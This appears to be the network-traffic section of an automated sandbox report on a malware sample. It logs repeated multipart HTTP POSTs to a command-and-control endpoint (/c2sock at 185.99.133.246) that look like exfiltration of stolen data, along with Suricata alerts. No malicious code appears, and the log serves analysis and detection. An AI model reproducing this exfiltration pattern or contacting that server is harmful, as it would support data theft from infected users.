Network Analysis
IP Address | Status | Action |
---|---|---|
185.99.133.246 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
TCP Requests

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 13358
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=phip8qj2oirtgedjmlb5f25f12; expires=Sun, 10 Sep 2023 18:36:24 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=hfpigu07gv6c10nodg26eagj97; expires=Sun, 10 Sep 2023 18:36:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 487823
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=rk0ok65b4ujvtnjun80asqhsht; expires=Sun, 10 Sep 2023 18:36:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=0punfhe7m2ntp9ci1nq4uckaea; expires=Sun, 10 Sep 2023 18:36:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=er1h30i2gshav4qfah4cu11hj1; expires=Sun, 10 Sep 2023 18:36:31 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 23084
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=54el2196qbjbruan77r697958t; expires=Sun, 10 Sep 2023 18:36:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 1360
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=76ac6dd2nkfsg8u7ulefd8792u; expires=Sun, 10 Sep 2023 18:36:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 1421700
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=1d6600fdcq2sa218kmc63ul5uv; expires=Sun, 10 Sep 2023 18:36:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=3p4an9kp72232ahfbjtihq8uq7; expires=Sun, 10 Sep 2023 18:36:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:49:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=oie88vtlvbd9bl38u1onmegu4o; expires=Sun, 10 Sep 2023 18:36:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 20226
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:50:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=me456r6vo9tklsuse5asm1o15p; expires=Sun, 10 Sep 2023 18:36:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:50:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=bhpd9t1v9hl8b1a7jbpte0ueng; expires=Sun, 10 Sep 2023 18:36:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:50:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=n27bff49pu3mrsv8amthgud22c; expires=Sun, 10 Sep 2023 18:36:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

POST 200 http://185.99.133.246/c2sock
Request:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 447
Host: 185.99.133.246
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 18 May 2023 00:50:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/8.2.4
Set-Cookie: PHPSESSID=jrael465v5mhbskgsvlo9i7066; expires=Sun, 10 Sep 2023 18:36:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 185.99.133.246:80 -> 192.168.56.103:49162 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts